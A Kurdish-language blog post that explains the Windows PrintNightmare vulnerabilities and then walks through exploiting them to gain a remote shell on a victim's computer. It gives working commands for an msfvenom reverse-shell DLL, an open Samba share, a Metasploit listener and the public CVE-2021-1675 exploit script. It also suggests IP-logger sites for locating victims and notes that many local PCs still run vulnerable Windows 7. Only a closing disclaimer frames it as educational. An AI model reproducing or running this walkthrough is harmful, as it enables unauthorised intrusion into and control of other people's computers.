ئایا PrintNightmare چییە؟!
بریتییە لە یەکێک لە هەرە ترسناکترین هەڵە سایبەریەکان کە دووچاری وەگەڕخەری ویندۆوس بۆتەوە لە سەرەتاکانی ئەمساڵ ، ئەم هەڵەیە لە ناو دەروازەی خزمەتگوزاریەکانی Print Spooler ڕوو ئەدا کە دوو جۆری جیاوازی هەیە ، کە یەکێکیان ئەبێتە هۆی ڕوودانی هەڵەی Remote Code Execution کە لە سیستەمی جیهانی CVE ـــــی ناساندن و پێناسەکردنی هەڵە لە سیستمەکاندا بە CVE-2021-34527 پێناسەکراوە ، و دووەمینیان بریتییە لە زۆربوونی دەسەڵات Privilege Escalation کە ئەمیشیان لە سیستەمی CVE ــــدا بە ناسنامەی CVE-2021-1675 ناسێندراوە.
دوا بودوای سەرهەڵدانی ئەم هەڵەیە ، لە بەرواری ٦ پوشپەڕی ساڵی ٢٠٢١ گەورە کۆمپانیای مایکرۆسۆفت نوێکردنەوەیەکی چاوەڕوان نەکراو Out-of-bandــــی ئاراستەی بەکارهێنەرانی ویندۆوس و وینۆوس سێرڤەر کرد بۆ ناساندی ئەم هەڵەیە لە نێو وەگەڕخەری ویندۆوس و پاراستنی بەکارهێنەران لەم دوو هەڵە سایبەرییە ترسناکە ، بەلام بەهۆی خێرا بڵاوبوونەوەی کەلێنەکان کۆمپانیای ناوبراو دەستبەجێ و بە شێوەیەکی هەڕەمەکی هەڵسا بە ناردنی نوێکاری بۆ هەریەک لە وەشانەکانی Windows 7 و ڕاژەی Windows 2012 بەڵام ئەم نوێکاریە چاوەڕوان نەکراوەی مایکرۆسۆفت بووە هۆی لەکارکەوتنی بەشێک لە چاپکەرەکاندا و سەرەڕاو ئەوەش لێکۆلەرانی بواری ئاساییشی ئینتەرنێتی تێبینی ئەوەیان کرد کە ئەم نوێکاریە خێرایەی مایکرۆسۆفت چارەسەری تەواوی کێشەکەی نەکردووە ، ئەمەش لە کاتێکدا کە ئەو نوێکاریە تەنیا ڕێگری لەوە ئەکرد کە جگە لە هەژماری Adminstrator کە بە مانایەکی تر دەسەڵاتی root دێ کەسی تر نەتوانێ درایڤەری چاپکەرەکان لەسەر Windows Print Server دابمەزرێنێ یاخوود بەکاریان بهێنێت کە وا دانرابوو هەر هەژمارێ دەسەڵاتی ئەدمینی نەبێ ڕێگەی پێ نەدرێ درایڤەری چاپکەرەکان لەسەر وەگەڕخەرەکان جێگیر بکا واتە ئەو هەژمارانەی کە دەسەڵاتی root یان نییە وەک بەشێک لەم دوو هەڵەیە حسابیان بۆ کرابوو لە نوێکاریەکانی مایکرۆسۆفتدا بۆیە دەسەڵاتی بەکارهێنەری ئاسایی کەمکرابوونەوە لەم نوێکاریانەدا.
شایەنی باسە کە ئەو هەڵانە لەلایەن ڕێکخراوی Sangforــــەوە دۆزراونەتەوە و لە ئەنجامی هەلەیەکی تەکنیکی بۆ سەلماندنی هەڵەکە بۆ کۆمپانیای پەیوەندیدار هەڵەکەیان بە شێوازێکی نەخوازراو لە Githubــــدا بڵاوکردبوویەوە بە شێوەی Public کە هەر کەسێ ئەیتوانی دەستی بە هەلەکە بگات ، دوای وریابوونەوەیان هەر خێرا لە گیتهەبی خۆیان سڕیبوویانەوە ، بەلام لە کاتێکدا کە چەندان کەس هەلەکەیان بەدەست خستبوو ، هەر بۆیەش چەندان کۆپی لە ئینتەرنێتدا بڵاوکرانەوە.
چۆن شێڵ بەدەست بێنم بەبەکارهێنانی ئەم هەڵەیە؟!
لێرەدا پەندێکی پێشینانم بیر کەوتەوە کە ئەڵێ “کاتێک شێر لەوێ نەبێ کەریش پاشایە” بگومان ئەو پەندە زۆر لەگەل ئەو پرسیارەمان لێک ئەگرێتەوە چونکە دیارە کە تەواوی ئەو هاککەرانەی ئێستا بەربوونەتە گیانی سیستمەکان و خەریکی وێرانکارین هەمووی لەسەر حسابی هاککەرانی پێش خۆیانە چونکە هیچ سیستەمێک هاک ناکرێ ئیلا کەلێنێکی هەبێ ، کە خۆشبەختانەش زۆربەی هەرە زۆری ئەو کەلێنانەی کە هاککەرە گەورەکان ئەیدۆزنەوە لەسەر سیستمەکان لە ئینتەرنێتا بلاوئەکرێنەوە کە لە دوای خۆیانەوە چەندان کاری چاکە و خراپەی پێ ئەنجام ئەدرێ لەلایەن مشەخۆرانی ترەوە کە ئێستا بە هاککەر ناوزەد ئەکرێن!
ئێستا با بێین و باس لەوە بکەین کە چۆن ئەتوانرێ دەست بەسەر وەگەڕخەری ویندۆوسدا بگیرێ بەبەکارهێنانی ئەم هەڵەیە:
بێگومان هەر وەک لە سەرەوە باسم کرد زۆربەی کەلێنەکان لە ئینتەرنێتا بە ئامادەکراوی ئەخرێنە بەردەست مشەخۆران و خۆشبەختانە ئەم کەلێنەش یەکێکە لەو کەلێنانە کە ئەتوانین لە ئینتەرنێتدا بەدەستی بێنین (کلیک بکە!).
هەنگاوی یەکەم: سەرەتا پێویستە ئاگاداربین کە پێویستمان بە دابەشکراوەیەکی لینۆکسە بۆ ئاسانکردنی کارەکانمان ، دوای ئەوەی کە ئەم پارچە دەست نووسەی نێو ئەو بەستەرەی سەرەوەمان کۆپی کرد و خستمانە نێو فایلێک بە پاشگری .py پاشەکەوتمان کرد ، دەست ئەکەین بە دروستکردنی پەیلۆدێک بۆ نێچیرەکەمان کە ئەمەش بە چەندان جۆر ئەکرێ ، کە یەکێک لە ئاسانترین ڕێگاکان بەکارهێنانی ئامرازی msfvenomـــــە کە بە شێوەیەکی بنچینەیی لەسەر زۆربەی دابەشکراوەکانی لینۆکس هەیە بەتایبەت ئەوانەی کە بۆ ئیشی لێکۆلینەوە و پاراستن بەکار دەهێندرێن لەوانە (Kali – Parrot – RedHat …etc) بەلام گەر یەکێک نەبیت لە بەکارهێنەرانی ئەم دابەشکراوانە ئەتوانیت بەم فرمانە دایبمەزرێنیت:
- sudo apt install metasploit-framework
دوای ئەم کردارە دەست ئەکەین بە دروستکردنی ئامرازەکە بەم فرمانەی خوارەوە:
- msfvenom -f dll -p windows/x64/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 -o reverseshell.dll
پاشان دەست ئەکەین بە گواستنەوەی پەیلۆدەکەمان بۆ بوخچەی temp بەم فرمانەی خوارەوە ، ئاگاداربە ئەم هەنگاوە دڵخوازانەیە و ئەتوانی ئەنجامی نەدەی ، ئێمە بۆیە ئەم کردارە ئەنجام ئەدەین بۆ ئەوەی هیچ شوێن پێیەک لە دوای خۆمان بەجێ نەمێنێ و هەمووی لەناو بچێ لەدوای کوژاندنەوەی وەگەڕخەری لینۆکسەکەمان:
- cp reverse.dll /tmp
هەنگاوی دووەم: دوای ئەوەی ئەوەمان کرد دەست ئەکەین بە ڕێکخستنی ڕاژەی SMB لەسەر وەگەرخەری لینۆکسەکەمان بەم فرمانەی خواروە فایلێکی بۆ ئەکەینەوە
- sudo nano /etc/samba/smb.conf
دوای ئەوە ئەم پارچە کۆدە ئەخەینە نێو فایلەکەوە:
[global] map to guest = Bad User server role = standalone server usershare allow guests = yes idmap config * : backend = tdb smb ports = 445 [smb] comment = Samba path = /tmp/ guest ok = yes read only = no browsable = yes force user = smbuser
دوای ئەوە دەست ئەکەین بە داگیرساندی خزمەتگوزاریەکانی ڕاژەی SMB بەم پارچە فرمانەی خوارەوە:
- sudo service smbd restart
هەنگاوی سێیەم: دوای ئەنجامدانی هەر یەک لەم فرمانانەی پێویستە جوێگرێک دابنێن بۆ ئەوەی کاتێ نێچیرەکە کەوتە تەلەکەوە جوێگرەکە شێڵمان بۆ بکاتەوە لەسەر کۆمپیەتەری ئەم کەسە یان سێرڤەرە بۆ ئەمەش ئامرازی msfconsole بەکار دێنین هەر ڕاستەوخۆ بۆ بەکارهێنانی ئامرازەکە لە تێرمیناڵ بنووسە msfconsole و چاوەڕێ بکە تا ئەیکاتەوە دواتر دەست ئەکەین بە ڕێکخستنی جوێگر بەم فرمانەی خوارەوە:
- use exploit/multi/handler
ئینجا هەمان ئەو پەیلۆدە ئەدەین بە جوێگر کە پێشوتر بەکارمان بردووە لەسەرەوە بۆ ئەمەش ئەم فرمانەی خوارەوە ئەنووسین:
- set PAYLOAD windows/x64/shell_reverse_tcp
دوای ئەوەش دەبێ ئایپی وەگەڕخەری لینۆکسەکەمان بدەین بە جوێگرەکە ، بۆ زانینی ئایپی وەگەڕخەرەکەت لە تێرمیناڵ ئەم فرمانەی خوارەوە بنووسە:
- ifconfig wlan0 | grep inet
دوای ئەوەی ئایپیەکەت دەرهێنا بڕۆوە سەر پەڕەی msfconsole و ئەم فرمانە بنووسە:
- set LHOST your_IP_address
پاشان دەبێ دەرچە PORT ێک بدەین بە جوێگر تا لەڕێیەوە پەیوەندی بگرێت لەگەل پەیلۆدەکە لەو کاتەی کە لەسەر کۆمپیوتەری نێچیرەکەمان جێگیر کراوە کە ئەمەش بەم فرمانەی خوارەوە ئەکرێ:
- set LPORT 4444
ئاگاداربە هەر پۆرتێکت بەکار هێنابێ بۆ دروستکردنی پەیلۆدەکە پێویستە هەمان پۆرت بدەیت بەجوێگر ئەگەر نا هیچ پەیوەندیەک دروستنابێ لە نێوان تۆ و نێچیرەکە!
دوای ئەوەی ئەم کردارانەمان جێبەجێ کرد دواجار پێویستە فرمان بە جوێگر بکەین کە بەو زانیاریانەی پێمان داوە جوێبگرێ بۆ هەر پاکەتێک کە بۆ ئەو ئایپی و پۆرتە دێت و ئەڕوا ئەمەش بە یەکێک لەو دوو فرمانە ئەنجام ئەدرێ کە بریتین لە (exploit / run) ئاگاداربە هەردووکی پێکەوە بەکار مەبە بە ئارەزووی خۆت دانەیەک ئەتوانی بەکار بێنیت!
هەنگاوی چوارەم: دوای ئەوەی ئەم کردارانەی سەرەوەمان جێبەجێ کرد دەست ئەکەین بە بەکارهێنانی ئەو exploit ــــەی کە لە هەنگاوی یەکەم دامانبەزاندبوو بۆ ئەوەی پەیلۆدەکەی پێ بنێرینە نێو کۆمپیەتەری نێچیرەکە ئەمەش لە ڕێگای ئەم فرمانەی خوارەوە ئەکرێ:
- sudo python3 CVE-2021-1675.py VICTIM’s_computer_Username:VICTIM’s_Computer_Pass@VICTIM’s_IP ‘\\YOUR_IP\smb\reverse.dll‘
لێرەدا بۆمان دەرئەکەوێ کە پێویستە سەرەتا چەند زانیاریەکمان هەبێ سەبارەت بە کۆمپیوتەری نێچیرەکەمان کە بریتین لە (ناوی هەژماری کۆمپیەتەرەکەی – پاسوۆردی هەژماری کۆمپیوتەرەکەی – ئایپی کۆمپیەتەرەکەی) ئەمەش زۆر ئاسانە کە ئەتوانرێ بە وێبسایتی Grabify یان IPlogger یان بە هەر شێوازێک بێ بەدەست بهێندرێ ، دوای جێبەجێکردنی ئەم فرمانەی سەرەوە سەیری پەڕەی جوێگری سەر تێرمیناڵەکەت بکە ئەبینیت کە شێڵت بۆ کراوەتەوە لەسەر کۆمپیوتەری نێچیرەکەت.
لەکۆتاییدا پێم خۆشە بڵێم کە: ئەم بابەتە تانیا بۆ مەبەستی فێربوون باسی لێوە کراوە و نە من نە هیچ ئەندامێکی ماڵپەڕی تێک ئای بەرپرس نییە لە هیچ کار و کردەوەیەک کە بەهۆی ئەم بابەتەوە ڕوو بدا و ئامنجامان تەنیا فێربوونە بۆ خۆپاراستن ، هەرچەند لە ئێستادا ئەم ئێکسپلۆیتە لەسەر کۆتا وەشانی وەگەڕخەری ویندۆوس کار ناکا و تەنیا لەسەر وەشانە کۆنەکان کار ئەکا بەلام بەداخەوە کە ئێستاش زۆربەی کۆمپیوتەری تاکی کورد هەر ویندۆوس ٧ یان لەسەرە ، بەڵام هەروەک پێشینانمان وتوویانە “کەر هەر کەرە گەر بیبەیتە بەغداش” بێگومان مەبەستم بێڕێزیکردن نییە بە هیچ تاکێک تەنیا مەبەستم ئەوەیە کە هەر کەسێ نیازی کاری خراپی هەبێ ئەوا ئەڕوات و فێرئەبێ چ لێرە یاخوود لە هەر شوێنێکی تربێ…